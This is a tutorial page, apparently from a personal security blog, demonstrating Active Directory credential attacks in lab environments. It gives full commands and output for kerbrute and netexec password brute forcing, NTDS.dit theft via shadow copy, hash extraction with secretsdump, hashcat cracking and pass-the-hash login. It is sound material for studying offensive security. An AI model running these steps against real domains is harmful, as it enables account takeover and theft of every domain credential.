Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Attacking Active Directory

We can attempt to extract credentials from Active Directory (ADDS) using dictionary attacks against AD accounts and dumping hashing from the ntds.dit file.

Once a workstation is joined to a domain, it will no longer use the local SAM database for authentication, but will instead query the domain controller (DC) for user credentials. However, the SAM database will still be used if you login locally to the workstation. This means that if we can compromise a workstation that is part of a domain, we may be able to extract credentials for domain users.

Dictionary Attacks

As always, dictionary attacks are noisy and typically easy to detect. However, they can be effective if you have a good wordlist and the target account has a weak password. Also note that many organizations have password policies (typically enforced via Group Policy objects) that require complex passwords, which can make dictionary attacks less effective.

One method of determining usernames is to use a tool like theHarvester or even LinkedIn to gather email addresses. Usernames are often the first part of the email address (e.g., jdoe for jdoe@mysite.com)

We can use a tool like kerbrute to perform a dictionary attack against Kerberos on the domain controller. This tool will attempt to authenticate to the DC using a list of usernames and passwords.

Once we have a list of valid usernames, we can attempt to brute-force passwords for those accounts. Here, we will use the popular rockyou.txt wordlist to attempt to brute-force the password for the vagrant user.

┌──(toor㉿blue)-[~/Downloads]
└─$ ./kerbrute_linux_amd64 bruteuser --dc 192.168.86.218 -d homelab.local /usr/share/wordlists/rockyou.txt vagrant

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/19/26 - Ronnie Flathers @ropnop

2026/01/19 13:48:38 >  Using KDC(s):
2026/01/19 13:48:38 >   192.168.86.218:88
2026/01/19 13:53:15 >  [+] VALID LOGIN:  vagrant@homelab.local:vagrant
2026/01/19 13:53:15 >  Done! Tested 114989 logins (1 successes) in 277.561 seconds

We can also use netexec to brute force a user password:

rnemeth@htb[/htb]$ netexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txt

SMB         10.129.201.57     445    DC01           [*] Windows 10.0 Build 17763 x64 (name:DC-PAC) (domain:dac.local) (signing:True) (SMBv1:False)
SMB         10.129.201.57     445    DC01             [-] inlanefrieght.local\bwilliamson:winter2017 STATUS_LOGON_FAILURE 
SMB         10.129.201.57     445    DC01             [-] inlanefrieght.local\bwilliamson:winter2016 STATUS_LOGON_FAILURE 
SMB         10.129.201.57     445    DC01             [-] inlanefrieght.local\bwilliamson:winter2015 STATUS_LOGON_FAILURE 
SMB         10.129.201.57     445    DC01             [-] inlanefrieght.local\bwilliamson:winter2014 STATUS_LOGON_FAILURE 
SMB         10.129.201.57     445    DC01             [-] inlanefrieght.local\bwilliamson:winter2013 STATUS_LOGON_FAILURE 
SMB         10.129.201.57     445    DC01             [-] inlanefrieght.local\bwilliamson:P@55w0rd STATUS_LOGON_FAILURE 
SMB         10.129.201.57     445    DC01             [-] inlanefrieght.local\bwilliamson:P@ssw0rd! STATUS_LOGON_FAILURE 
SMB         10.129.201.57     445    DC01             [+] inlanefrieght.local\bwilliamson:P@55w0rd! 
<SNIP>

In the example above, netexec is using smb to attempt to authenticate to the DC using the bwilliamson username and a list of passwords from fasttrack.txt. When it finds a valid password, it will print it to the screen. Note that if an account lockout policy is configured (which) is likely these days), repeated failed login attempts may lock the account, so use caution when performing brute-force attacks. Repeated and unexpected account lockouts is almost always a sign of an ongoing brute-force attack, and a sure way to get noticed. Tread lightly.

Dumping ntds.dit

The ntds.dit file is the Active Directory database that contains all of the information about the domain, including user accounts and their hashed passwords. If we can obtain a copy of this file, we can attempt to crack the hashes offline using a tool like hashcat or john the ripper.

We can use evil-winrm to connect to a Windows machine that is part of the domain using the credentials we have obtained:

rnemeth@htb[/htb]$ evil-winrm -i 192.168.86.218 -u vagrant-p 'vagrant'

We can check with groups a user account is a member of:

*Evil-WinRM* PS C:\Users\vagrant\Documents> net groups

Group Accounts for \\

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.

We can also check the password policy and find some other useful information about this user account:

*Evil-WinRM* PS C:\Users\vagrant\Documents> net user vagrant
User name                    vagrant
Full Name                    vagrant
Comment                      vagrant
User's comment
Country/region code          001 (United States)
Account active               Yes
Account expires              Never

Password last set            1/13/2026 3:32:20 AM
Password expires             Never
Password changeable          1/14/2026 3:32:20 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/19/2026 6:56:35 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Users
Global Group memberships     *Domain Users
The command completed successfully.

We can see that the vagrant user is a member of the Domain Admins group, which means we have administrative privileges on the domain. This will allow us to dump the ntds.dit file.

We will need to make a shadow copy of the volume that contains the ntds.dit file using vssadmin:

*Evil-WinRM* PS C:\Users\vagrant\Documents> vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Successfully created shadow copy for 'c:\'
    Shadow Copy ID: {f089068a-e156-493c-aa90-d08f78f2f8e9}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
*Evil-WinRM* PS C:\Users\vagrant\Documents>

The location of the ntds.dit file is typically C:\Windows\NTDS\ntds.dit (this can be changed when installing ADDS). We can copy this file from the shadow copy to a location we can access:

*Evil-WinRM* PS C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

        1 file(s) copied.

Note: As was the case with SAM, the hashes stored in NTDS.dit are encrypted with a key stored in SYSTEM. In order to successfully extract the hashes, one must download both files.

We can use secretsdump.py from the Impacket suite to extract the hashes from the ntds.dit file:

rnemeth@htb[/htb]$ impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x62649a98dea282e3c3df04cc5fe4c130
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 086ab260718494c3a503c47d430a92a4
[*] Reading and decrypting hashes from NTDS.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:e6be3fd362edbaa873f50e384a02ee68:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cbb8a44ba74b5778a06c2d08b4ced802:::
<SNIP>

A faster method: Using NetExec to capture NTDS.dit

Alternatively, we may benefit from using NetExec to accomplish the same steps shown above, all with one command. This command allows us to utilize VSS to quickly capture and dump the contents of the NTDS.dit file conveniently within our terminal session.

┌──(toor㉿blue)-[~/Downloads]
└─$ netexec smb 192.168.86.218 -u vagrant -p vagrant -M ntdsutil
SMB         192.168.86.218  445    WIN-F78TN8NTHVE  [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN-F78TN8NTHVE) (domain:homelab.local) (signing:True) (SMBv1:False)
SMB         192.168.86.218  445    WIN-F78TN8NTHVE  [+] homelab.local\vagrant:vagrant (Pwn3d!)
NTDSUTIL    192.168.86.218  445    WIN-F78TN8NTHVE  [*] Dumping ntds with ntdsutil.exe to C:\Windows\Temp\176884951
NTDSUTIL    192.168.86.218  445    WIN-F78TN8NTHVE  Dumping the NTDS, this could take a while so go grab a redbull...
SMB         192.168.86.218  445    WIN-F78TN8NTHVE  [-] wmiexec: Could not retrieve output file, it may have been detected by AV. If it is still failing, try the 'wmi' protocol or another exec method
NTDSUTIL    192.168.86.218  445    WIN-F78TN8NTHVE  [-] Error while dumping NTDS

RESULTS MAY VARY DEPENDING ON ANTIVIRUS/EDR PRESENCE AND CONFIGURATION

Cracking Hashes

Once we have obtained the hashes from the ntds.dit file, we can attempt to crack them using a tool like hashcat or john the ripper. Here, we will use hashcat to attempt to crack the hashes using the rockyou.txt wordlist:

rnemeth@htb[/htb]$ sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt

64f12cddaa88057e06a81b54e73b949b:Password1

Pass the Hash (PtH) considerations

We can still use hashes to attempt to authenticate with a system using a type of attack called Pass-the-Hash (PtH). A PtH attack takes advantage of the NTLM authentication protocol to authenticate a user using a password hash. Instead of username:clear-text password as the format for login, we can instead use username:password hash. Here is an example of how this would work:

rnemeth@htb[/htb]$ evil-winrm -i 10.129.201.57 -u Administrator -H 64f12cddaa88057e06a81b54e73b949b